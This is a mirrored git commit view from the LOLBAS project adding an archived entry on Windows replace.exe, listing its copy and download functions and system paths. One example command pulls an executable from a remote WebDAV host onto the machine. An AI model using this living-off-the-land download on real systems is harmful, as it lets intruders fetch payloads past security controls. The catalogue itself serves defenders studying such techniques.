mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-28 21:22:07 +02:00
Removed MD files, we only use the webportal from now on. All MD files moved to archive
This commit is contained in:
21
Archive-Old-Version/OSBinaries/Replace.exe.md
Normal file
21
Archive-Old-Version/OSBinaries/Replace.exe.md
Normal file
@@ -0,0 +1,21 @@
|
||||
## Replace.exe
|
||||
* Functions: Copy, Download
|
||||
```
|
||||
|
||||
replace.exe C:\Source\File.cab C:\Destination /A
|
||||
Copy the specified file to the destination folder.
|
||||
|
||||
replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
|
||||
Copy the specified file to the destination folder.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/elceef/status/986334113941655553
|
||||
* https://twitter.com/elceef/status/986842299861782529
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\System32\replace.exe
|
||||
* C:\Windows\SysWOW64\replace.exe
|
||||
|
||||
* Notes: Thanks to elceef - @elceef
|
||||
|
Reference in New Issue
Block a user